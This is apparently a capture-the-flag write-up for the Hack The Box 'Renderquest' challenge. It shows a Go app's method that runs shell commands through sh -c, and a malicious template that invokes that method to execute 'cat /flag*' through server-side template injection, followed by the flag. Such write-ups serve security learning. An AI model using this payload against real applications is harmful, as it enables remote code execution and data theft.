Renderquest

https://app.hackthebox.com/challenges/renderquest

CHALLENGE DESCRIPTION

You've found a website that lets you input remote templates for rendering. Your task is to exploit this system's vulnerabilities to access and retrieve a hidden flag. Good luck!

Homepage

Src code review

It's a website that allows you to make websites with templates, the website here will render it and display the output.

The juicy data lies here:

func (p RequestData) FetchServerInfo(command string) string {
	out, err := exec.Command("sh", "-c", command).Output()
	if err != nil {
		return ""
	}
	return string(out)
}

The provided features of the website will be rendered through this code:

reqData.ClientIP = clientIP
reqData.ClientUA = userAgent
reqData.ClientIpInfo = *locationInfo
reqData.ServerInfo.Hostname = reqData.FetchServerInfo("hostname")
reqData.ServerInfo.OS = reqData.FetchServerInfo("cat /etc/os-release | grep PRETTY_NAME | cut -d '\"' -f 2")
reqData.ServerInfo.KernelVersion = reqData.FetchServerInfo("uname -r")
reqData.ServerInfo.Memory = reqData.FetchServerInfo("free -h | awk '/^Mem/{print $2}'")

It's a classic SSTI. Since we can load our own template here, we can abuse FetchServerInfo method to get RCE.

Malicious template

<html>
<body>

<h1> RCE execution </h1>

<p>{{.ServerInfo.KernelVersion}}</p>
<p>Flag:  {{.FetchServerInfo "cat /flag*" }} </p>

</body>
</html>

{{.FetchServerInfo "cat /flag*" }} what this line will do is call FetchServerInfo and send cat /flag* as a parameter, as it's using sh -c it will execute our cmd, giving us the flag

Flag: HTB{qu35t_f0r_th3_f0rb1dd3n_t3mpl4t35!!}

Reference

Method Confusion In Go SSTIs Lead To File Read And RCE - OnSecurityOnSecurity

___________heapbytes' still pwning